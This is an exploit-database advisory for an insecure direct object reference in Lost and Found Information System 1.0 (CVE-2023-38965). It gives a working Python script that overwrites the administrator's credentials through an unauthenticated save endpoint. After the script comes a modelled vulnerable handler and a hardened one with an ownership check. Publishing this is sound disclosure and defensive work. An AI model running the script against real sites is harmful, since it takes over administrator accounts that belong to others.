packetstorm | Or4nG.M4N | PACKETSTORM:175077
History: Oct 12, 2023 - 12:00 a.m.

Lost And Found Information System 1.0 Insecure Direct Object Reference

Source: packetstormsecurity.com

EPSS: 0.003 Low, Percentile: 69.7%

```python
# Exploit Title: Lost and Found Information System v1.0 - idor leads to Account Take over
# Date: 2023-12-03
# Exploit Author: OR4NG.M4N
# Category : webapps
# CVE : CVE-2023-38965

# Python p0c :

import argparse
import time

import requests

parser = argparse.ArgumentParser(description='Send a POST request to the target server')
parser.add_argument('-url', help='URL of the target', required=True)
parser.add_argument('-user', help='Username', required=True)
parser.add_argument('-password', help='Password', required=True)
args = parser.parse_args()

# User "save" endpoint of the application
url = args.url + '/classes/Users.php?f=save'

# Form fields sent to the endpoint; 'id' is the client-supplied
# reference to the user record (the object reference in this IDOR)
data = {
    'id': '1',
    'firstname': 'or4ng',
    'middlename': '',
    'lastname': 'Admin',
    'username': args.user,
    'password': args.password
}

# The request carries no session cookie
response = requests.post(url, data)
# The script treats a "1" in the response body as success
if b"1" in response.content:
    print("Exploit ..")
    time.sleep(1)
    print("User :" + args.user + "\nPassword :" + args.password)
else:
    print("Exploit Failed..")
```
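
The PoC above posts a client-chosen `id` to `/classes/Users.php?f=save` without any session cookie. The following added example (a Python model, not the application's PHP and not part of the original post) shows that handler without and with an ownership check; the session dictionary, the `role` field, the `denied` reply and the sample records are assumptions.

```python
import hashlib
import os

DENIED = "denied"
EDITABLE = ("firstname", "middlename", "lastname", "username")


def apply_update(users, uid, form):
    """Write submitted fields to users[uid]; keep only a salted password hash."""
    rec = users[uid]
    for field in EDITABLE:
        if field in form:
            rec[field] = form[field]
    if form.get("password"):
        salt = os.urandom(16)
        digest = hashlib.pbkdf2_hmac("sha256", form["password"].encode(), salt, 100_000)
        rec["password"] = salt.hex() + ":" + digest.hex()
    return "1"  # the success reply the PoC looks for


def save_user_vulnerable(session, form, users):
    """IDOR: the client-supplied id picks the record; the session is never consulted."""
    uid = int(form["id"])
    return apply_update(users, uid, form) if uid in users else DENIED


def save_user_hardened(session, form, users):
    """Same update, but only for the caller's own record, or any record for an admin."""
    if not session or "user_id" not in session:
        return DENIED  # no authenticated session
    try:
        uid = int(form.get("id", ""))
    except (TypeError, ValueError):
        return DENIED
    is_admin = session.get("role") == "admin"  # role field is an assumption
    if uid != session["user_id"] and not is_admin:
        return DENIED  # the object reference does not belong to the caller
    if uid not in users:
        return DENIED
    return apply_update(users, uid, form)


def sample_users():
    """Constructed records for the demonstration."""
    return {1: {"username": "admin", "password": "x"}, 2: {"username": "staff1", "password": "y"}}


if __name__ == "__main__":
    form = {"id": "1", "firstname": "a", "middlename": "", "lastname": "b",
            "username": "changed", "password": "changed-pw"}  # constructed request body
    for handler in (save_user_vulnerable, save_user_hardened):
        users = sample_users()
        print(handler.__name__, handler(None, form, users), users[1]["username"])
```

The hardened handler returns the same reply for every refusal, so a caller cannot use it to learn which record ids exist.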
